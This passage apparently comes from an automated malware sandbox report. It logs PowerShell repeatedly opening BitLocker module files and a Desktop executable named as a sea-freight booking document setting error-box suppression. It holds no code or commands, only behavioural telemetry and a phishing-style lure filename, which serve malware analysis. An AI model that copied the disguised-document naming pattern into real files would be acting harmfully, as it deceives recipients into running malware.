Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
